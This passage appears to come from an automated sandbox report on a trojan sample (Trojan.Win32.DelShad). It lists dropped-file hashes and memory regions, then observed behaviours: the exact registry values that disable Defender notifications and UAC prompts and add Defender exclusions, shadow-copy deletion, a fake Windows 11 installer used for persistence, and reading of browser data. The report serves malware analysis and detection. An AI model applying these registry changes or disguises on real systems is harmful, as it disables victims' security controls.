| SHA512 | 30043e461f3e1f9a19d24dc582d171a7b50cb9c60fbe03ece12eedbed3d41b745714327706c3e93265aab98f206fc144a7e03904465fcb19d9a681b8639a1e09 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | bb20ef9c5e8647b19e7af26229108c99 |
| SHA1 | ff642a69365bdf05364872d951ff5bf9c403a804 |
| SHA256 | ef63978031b34cdc4613db378395ce28f3cc7d35f318ac62f730f90edf181f44 |
| SHA512 | 914ace2948982c607c61293d79bef662446b5227eac258abfdf601ef8eb968680ba5ceca1319d0c32064c21ded5812c0b3319642749083d52ea8905da82bc22f |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 24ec3a554f64015482f0960b410d8bd0 |
| SHA1 | 475ff8b22800c59a3f7446e693eac5292532f39e |
| SHA256 | 1692df1cc5b0f58b7df9ab78821a06196b0466683983c8949cf6b01ef12b0df2 |
| SHA512 | 977a9a1984c06800487eef736a1a9061acb6f62c6aa66dba919339007aa973bbf9a10e51482bdb59e14ff646b2c85c6198e59211d116b148fb7ca1d53415f3e4 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 710e85ee4c7bf73f9c8e8b0e0224af55 |
| SHA1 | 61f0aae0865344c6f799cf489c02ec64cc50bdd3 |
| SHA256 | e5c6683bb998f821dc813fe05eed0e90a73dcc64589238370871ec2cf1e12246 |
| SHA512 | 5221fd39ceae5a40393884d03122e3023e8b8b46808ce47ced7e6bc416838e539109bed81c3f3bf1cbe9034a86cef08c3f3f791a04b5dc7762af0e5a9726fc27 |
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\.cmd
| MD5 | 22a845995279c76177c613100a58d134 |
| SHA1 | 5cc94610bcdba7b0d514b711852a6cdb56db3ae1 |
| SHA256 | ca30adad79ccd83b3dc79f26a58c1552559176f8a271237c6d4d7ccf307920c0 |
| SHA512 | 0a4a3eb765847ab66e847bb83202ee8ad5d8591659a8be9e3ed4b6863f3aac28f9d4f6e2d4ca5c5efe800cfe30d471122b2f96807c2735dde5c6ade16c064cad |
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
| MD5 | 408dd6ade80f2ebbc2e5470a1fb506f1 |
| SHA1 | e00293ce0eb534874efd615ae590cf6aa3858ba4 |
| SHA256 | 4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71 |
| SHA512 | 4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0 |
C:\Users\Admin\AppData\Local\Temp\5w0e2v0n.tmp
| MD5 | 31c5a8d7f0d900bfff09d437a7457478 |
| SHA1 | c32f7abbc47949c340a2136bb8cc4787f05b1eff |
| SHA256 | 89da44ebaa36a31740f9dbc585cefc3f55cf725f7d8d745b44ba259f0a1d8455 |
| SHA512 | 0089a7e5e0c3d7b8a226775f30983e901b323846d5263366672390ebbbd9212bd72bdb87c7baeeb09c6438317a66f5ccfc20cd898579190e6bb7579dd1cd158a |
C:\Users\Admin\AppData\Local\Temp\autDD13.tmp
| MD5 | bdb4dcbcec51d9ee1afee83221921fee |
| SHA1 | 21d56a9334238297d1a09aba46043cc36c9e2d3c |
| SHA256 | 9e5d8505b986e40cce00707180334fead34c0c3b590c458305de89e4bbc85f75 |
| SHA512 | cad20e6355cfe1e42a4ee7f5350a033ec79b8ed2689d8c6fa11bb1c3ae2a99425f03d95312ed9daf5c2543fc7ce38239fca41700cbecbc02a007a669ffd81fa5 |
C:\Users\Admin\AppData\Local\Temp\autDD02.tmp
| MD5 | c87a407a6decc862e3132efc8ab504c9 |
| SHA1 | 20cd713fa491119aabfd25a7cce7a8209098f903 |
| SHA256 | 439de9f662754bbcfc211658ce3f1c1730e85df199ed1e067940e28831d2c758 |
| SHA512 | 8bed0ca582ca5b46f0c6922995343388df0d84d063512308d3f58c31da1811cb2c47b87be0ce5de4a1fb8ce14f89f8f3197f31bb0ca989fa159514f6751e1832 |
C:\Users\Admin\AppData\Local\Temp\autDD14.tmp
| MD5 | 3886aae8ae30f288363ce4d2ac4f81c2 |
| SHA1 | 19441c886b57ed9f4650f614f0d93501d0a33e40 |
| SHA256 | 37f10f3d46a2886cac6169a398e91dd8cd0cfd06a7b6812e1afb68c4c031b9fd |
| SHA512 | b37aa26a5324723d9b8a7b919c3727565a1e1974ba1316093b59dbe4a75f5e0773288894d7abb403d65688e0e3f29ef4b48af7a8048e64fe36199bf8d371fb31 |
C:\Windows\Temp\4f6v2e8z.tmp
| MD5 | a69e54b63a067cefab41736717e9348b |
| SHA1 | 96e00b5f3170d19d173e62b97c1691fac8edfb98 |
| SHA256 | c72184932dd0541095be4827e5f86b3db735cfc651f04b50a1cc783d9037d75d |
| SHA512 | 13385b98377cb664907a5189cbf63f575c86b5b705df2a458ae21c6fd63f6cbf77451e8f17b22af8921a3342f31445278cb8450e1cc58fe33eecffe81e56cdda |
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\.cmd
| MD5 | 6f0d036f6681bac6fd742591ddc62808 |
| SHA1 | 2e518c19ec29b7a3a69cd9d4c120d3b88d71102b |
| SHA256 | ce8f0822d428e39157fc6ed433b8da7fa7ce62ece2c73bed9930d50f7cb41f24 |
| SHA512 | 8aeb47d8a15ab62a1a6e23f93a916f361703d2ac64a302d2364d40de016dc2167d653ca905197d81e4c578fdbb81eb88a22c7cd81abe08756ec86dda6a44aaf6 |
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr
| MD5 | e9f5799bcca4695afee82c0781242577 |
| SHA1 | 240bf1ae93f432aef2a05daeed3299d12bd7e6f8 |
| SHA256 | dc24023611f63b84f4fddc095a1417518ae1972743dbbff014d31218770e48d6 |
| SHA512 | b1551197efd2209b633ed0ca581332a1871416a541a64ef99dffd75c7a082b65c4fa3abdc15b84ff92cdac224c6616a40c17b33c268df3f6244f0b2c920b143c |
memory/2388-489-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/2516-491-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/2516-492-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/4104-497-0x0000000000400000-0x000000000071D000-memory.dmp
memory/4104-501-0x0000000000400000-0x000000000071D000-memory.dmp
memory/2388-504-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/2516-505-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/1500-510-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-511-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-509-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-508-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/2516-513-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/1500-506-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-512-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-517-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-515-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-514-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-516-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\write.zip
| MD5 | 3e67b93b520e02f8f2e921699058dc67 |
| SHA1 | 46389ff76252d50c084ca75562ca8f1e52a1600b |
| SHA256 | 46a81ce975d504053383859df735eb7e2d07b462f6579e34ff31abe4f387868c |
| SHA512 | 82831ef410c4e5b247365881cc4f9d427e19cde81a98a1ef274df74dbb6457db111d789f80261994b4b4018fd6c8cace87bbc8bb85e0f00ba20e4e713d464f7c |
memory/1500-547-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-548-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-546-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-550-0x0000000011000000-0x0000000011158000-memory.dmp
memory/1500-551-0x0000000003210000-0x00000000032B7000-memory.dmp
memory/3720-561-0x000001D6F7230000-0x000001D6F7252000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4a53wlik.qgp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1500-567-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-568-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 566196008fd3b62fea9bb56193337a45 |
| SHA1 | 7ce0b22d7ef882fd1e75b7ec9aa9f9cf6c37ee0f |
| SHA256 | 935a35d6b093da96fe41078e8c9e94bf3739c0473468381f038abe4897a2d3b3 |
| SHA512 | 91d46b12a52e70070c89e8ff14381e94b08e1c77571e516bacdc19c8cbc657c1e6c018d43361beafb4fc361c660bb1546a0eb6b7e3305a5ee4c6d7e6b85584d4 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | dc3369dfedf8231eb340f9d7777ee067 |
| SHA1 | 44e1401599d4f6bb2936b092a95168611a8e1e53 |
| SHA256 | ab37d732267dbd467901d741cf45422ea39f16a6fb8e95269fe9778a3a6468ef |
| SHA512 | ddc7a9a769cf5293dbaf9961dced1e8f1231a1c9054c0849f44a0257dbdee10562a523632951d122dfe73ef72345978cff59a6bbb8e80a4d6209a5aa477fd5a5 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 548dd08570d121a65e82abb7171cae1c |
| SHA1 | 1a1b5084b3a78f3acd0d811cc79dbcac121217ab |
| SHA256 | cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc |
| SHA512 | 37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b |
memory/1500-587-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-588-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | e1c4dd4d5d8d148fbd453dd494f573a9 |
| SHA1 | 15a3c81ae4528cd8ceb9c4ce7ee1fdb354aeeff9 |
| SHA256 | 4aa90af4d0ac7e0ec31026c6c8fa477b950cb3e489887c23743252b1258452ed |
| SHA512 | 3bd5d67b1af2180b2c335f6b0034eea571140437bfa43aa3e4e860b00582d4609e565e1fe8d3f09c752feaea7decbc014203e85930ccb10cdb49ba7d9ddb958b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 128b92209197100ce7aff24e1fcb531e |
| SHA1 | 3333b685091e506aba63a8fa480abcb3e387ca11 |
| SHA256 | 486ea5d4e5a060d5e2b325a29184963117b806eac4c3c8f2054e270977a6a76b |
| SHA512 | 75aa70ee708b793be9a72a11a6e60c356181bbb93d6c2addd627606974048733f760850f4022926fc0f13b8a7dcdd94cd4b4a5374a0e57d236525649fe7a221f |
C:\Users\Admin\AppData\Local\Temp\qtc9j1wbnrqd240699406.tmp
| MD5 | 835216de14bf2793abd0586da1d76ce1 |
| SHA1 | bd87afd6af0104d875ccd1216543efedc79e0348 |
| SHA256 | 27fbf4c0081c9f9116dc8ac834b418d2e5e487a234b311c4d01df520e632ac42 |
| SHA512 | 340834eab831ddf8caa8ea671e852dd02a203730a2dfde79789a843343916e6b5e644556646ae9c3a149220960442669b7e66755819afd8f9825a79032e7623f |
C:\Users\Admin\AppData\Local\Temp\4l3szsqpghx240699406.tmp
| MD5 | c3f87d238aaed9863b6793637d2a2b70 |
| SHA1 | 8125a310c5917614e923f0199c29ba9db940f4e5 |
| SHA256 | 1e09147618a4cb8a9f1934d7aa7e5a1d63e6b59d520f99d2463da9f985862e28 |
| SHA512 | f1ea6ac293be1198fedaa6ab1a797e287d6ec3ad04b4918526a30e1dd53e39f3f7ae859695f5fc263f26433c40e1a295d7bea1ce8d3d15a55adc7c3227533b95 |
C:\Users\Admin\AppData\Local\Temp\s0g722c9e4j4ta1w240699406.tmp
| MD5 | 28bd22d15439cc77c7c0fe7cf08c00be |
| SHA1 | e2ab393f9b56244fe1a6f74a90d44309c3fdd72c |
| SHA256 | 059272d6cd27138a93b2e057fc0be12fcea0103ad13039bdd96d0e5b45979904 |
| SHA512 | f623cb0bef8ef79b59c751d4f86d49625e096dc96b276f830cba9847294006188b933574148305d2e4da9a9b720ee4dbcc0681f040ea844b4e8ae5685a0d9fb8 |
memory/1500-615-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 9a806d8fa80b249b8496970f0e861757 |
| SHA1 | f66d889c631374d20f34f63080e70d0fc1b64c34 |
| SHA256 | 255640b1083a1404de2776d2bfdf7e0f62bb2f3e8768b0123483bb2b138208c7 |
| SHA512 | 8e9662ed95a168263c6da255a12f6be7912c6e0d1483345e8c068633f24a5a59ca9380120561e0d90fc4367a79bf5dfe00b368891581ace1f794be92736f41fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8acf8824ca8a7a5f6006d7027cb222df |
| SHA1 | 3e31fd65c6af8d1478abb028e45a0c6ddb9551d4 |
| SHA256 | e60b40ecf21924803020ea1b8683bd03a447fbcb3b0f03973f55af26d460a0e4 |
| SHA512 | a0011284c3deef2ce1a27f5788579a956892c64c88fe4107b90ce0c6d27b549f4adfcb5d157aa7e03db23b2f40a98b9e11846444a8edbef9f2b6775d300a89e1 |
C:\Users\Admin\AppData\Local\Temp\kbvc7t58g7u3ky240705343.tmp
| MD5 | 40f3eb83cc9d4cdb0ad82bd5ff2fb824 |
| SHA1 | d6582ba879235049134fa9a351ca8f0f785d8835 |
| SHA256 | cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0 |
| SHA512 | cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 561de019b9840a42747a02592313ff87 |
| SHA1 | c719ffcb7f0a14cf423701538ed3260eab73cd0f |
| SHA256 | 8c8f14a0e1291359222b414da52809cfbe2617c1bf8ed74ac659681012d44bd7 |
| SHA512 | 28bb19843da07444da3b2332f6960a63ad01fd7afde7551fc4fe50c9de894cd065629381202ffe7be6671a7ea7a6fc0aadf9a3842d415bf6d6db9e8b4c6002c6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 873ba23f7e507f90cc56b43e045ec280 |
| SHA1 | 90daa1586ebe076fca078be2bcaf7dce463653e3 |
| SHA256 | ae29c38c2dd18cad6a19583cc849e538455fa3f0d87cfdd44894dc78c70c8097 |
| SHA512 | 2c458439159ebc6165b0917310b5ce47eefd1a025cd7f4bac9897d1bb985a72b917978cdfb37fca35d1d18c68d65e5b310ba8619c73a9db353605d5a930cdea5 |
memory/1500-654-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 3b908c0ed8a6c413ede0a4aeb54f2a40 |
| SHA1 | 69c4a4378372921adf424f4b0c9245d158282413 |
| SHA256 | e9a953d94ac65ce488b80e6e1b06f3ae883db98cc7ed3075725dc89530ef38f3 |
| SHA512 | 3095c2031dec75724ae3e0193176c15aa0fe26e223ac1090d2a12cc29a1385d04a31e9e0e2085aa9c9ce8d85bed7216936e4d687c34f42dd96228ac93f5073bb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1c8ed1293d221f14d6142addad60bb7e |
| SHA1 | 6c236459abbd5617fe62f1c1898c5cdc072f0bcb |
| SHA256 | 0992caa251b9bdf1f789dcf487dc29dad58f2376578573c037d106f608743dd5 |
| SHA512 | 3a0716fdbd3a62a065e6f1c5479a495e98bafdd026a3b2c33a0d181ba06069f8f14e910daa69000432da983a0bb87ea4db804562149d58049e393ce0206fe52c |
memory/1500-672-0x0000000000400000-0x0000000000AE1000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | ca986d9782f99b6f0282259ce0d15a25 |
| SHA1 | d610fe9bd5f719efa3769208e48947a888593a93 |
| SHA256 | 551551236a850c5a767f4d2aab66d4f4d80b3ca42419cd63b2954966de50ac88 |
| SHA512 | d0adba5eb2d6a6cd15838131bc2a1e242f6cf09b435529e97f652a3ccfdade3b214037b8500fde243cb793ae6f3c19a38b0caf148d9729bf33f6369f893fa469 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 65e1866bd8c7557d214595156f8dce98 |
| SHA1 | 849b6f690d6f01bb67c4a5ed96dfacd18b576168 |
| SHA256 | 49fcf95b7c221741bf9c043e0eefcc5dddabcdf4aaff46b3f223b238d54e9118 |
| SHA512 | 61809063e29e1558fa5e297cf3e42bda75df4ed3e505222fa06dedda590772974cb4dbf872c9cd7fdf448f851f13fa5cf601b3adf8621fa4129b004995827f9b |
C:\Users\Admin\AppData\Local\Temp\6jxlgcys2lua7de0837xdm1.tmp
| MD5 | 86e766350f927b4fede500e323c47db3 |
| SHA1 | 8e1fc56f8d7e65abfaaa6481cb6646a3ab65de3e |
| SHA256 | 35aae919703c3f308c10c4336ebcd619a2687e0c5ee806291342574fc9062914 |
| SHA512 | 8764ae5d6c803b5b2c16df8fef071bc2936d58a9e8941ee042d57ca9e63e2ffe8eb7b96256ae142e435db747b2f21884c53b9b3ec95ea6c43677fff0b1fbc9f3 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 6adbe54e7281dab7b9768820ebd2e62e |
| SHA1 | 0291a89afcb83a19ee8e75419520ed3692cfc272 |
| SHA256 | ace92c691485841c62c1a47dfca56371551bca2f999276816d8b9e64babf9f65 |
| SHA512 | 89d1d1d0010f521ac7f2b6496cc686b3bbf0084f69599f19c82d4315a02aec23da7779c6a15f7118f162ba2e14eda7b958b14bb701ddce3d88e4e2727646adcd |
memory/1500-713-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 7e2354d86543f4adfaa93dae40700ed6 |
| SHA1 | 5278d86e64943509eeb7aed3601bfb019c82358d |
| SHA256 | 207710a217eebe8a716270e9c91e2db281150be60197e8da8c207d24904796a1 |
| SHA512 | 76a2bbd7ee20e7f19840caab62caa10cf5b9ed32c7e6417870ce2fd4e874aa6bddcb2a954df156856107c437fc175514f833deaef57a2bd8c1af81f8cca44ad5 |
memory/1500-737-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 2346739c2cf73bd8477d82cbddbede56 |
| SHA1 | d93cde020b27e2579dea31c942bebf288686b83c |
| SHA256 | fa21d4a3623da30d15d18421819bd95398a4dad3514b728b8b2c886a61b17936 |
| SHA512 | 7da379f73724abe2af4ba427ef5ac47c3f99ebb78eea3dcc4e09e87b53c5ad740e6cb225bab02356c2db7948320b5937565d71b7b4f601107933387235b107ef |
memory/1500-761-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-767-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-769-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/4208-782-0x0000000004FC0000-0x0000000004FF6000-memory.dmp
memory/4208-783-0x0000000005630000-0x0000000005C58000-memory.dmp
memory/4208-784-0x00000000055C0000-0x00000000055E2000-memory.dmp
memory/4208-785-0x0000000005D90000-0x0000000005DF6000-memory.dmp
memory/4208-788-0x0000000005E00000-0x0000000005E66000-memory.dmp
memory/4208-796-0x0000000006000000-0x0000000006354000-memory.dmp
memory/4208-797-0x00000000064D0000-0x00000000064EE000-memory.dmp
memory/4208-798-0x0000000006510000-0x000000000655C000-memory.dmp
memory/4208-799-0x00000000076B0000-0x0000000007746000-memory.dmp
memory/4208-800-0x00000000069B0000-0x00000000069CA000-memory.dmp
memory/4208-801-0x0000000006A00000-0x0000000006A22000-memory.dmp
memory/4208-802-0x0000000007D00000-0x00000000082A4000-memory.dmp
memory/1500-816-0x0000000000400000-0x0000000000AE1000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-14 23:57
Reported
2024-11-15 00:00
Platform
win10ltsc2021-20241023-en
Max time kernel
150s
Max time network
156s
Command Line
Signatures
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\dIsablEEnhAncEdnOtiFiCatiOns = "1" | C:\Windows\system32\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsenTPrompTbEhAvIoradmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsEnTPromptbehavIOrUser = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromPTOnsECUredesKtoP = "0" | C:\Windows\system32\reg.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns | C:\Windows\system32\rEg.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\EXE = "0" | C:\Windows\system32\rEg.EXE | N/A |
| Key created | \REGISTRY\MACHINE\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs | C:\Windows\system32\rEG.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\SCr = "0" | C:\Windows\system32\rEG.EXE | N/A |
| Key created | \REGISTRY\MACHINE\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns | C:\Windows\system32\rEg.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\Cmd = "0" | C:\Windows\system32\rEg.EXE | N/A |
Deletes shadow copies
Disables use of System Restore points
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Windows\system32\cmd.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-U7LE5.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk | C:\Users\Admin\AppData\Local\Temp\is-I11FA.tmp\Trojan.Win32.DelShad.tmp | N/A |
Executes dropped EXE
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipINFO.io | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1276 set thread context of 1652 | N/A | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-U7LE5.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-I11FA.tmp\Trojan.Win32.DelShad.tmp | N/A |
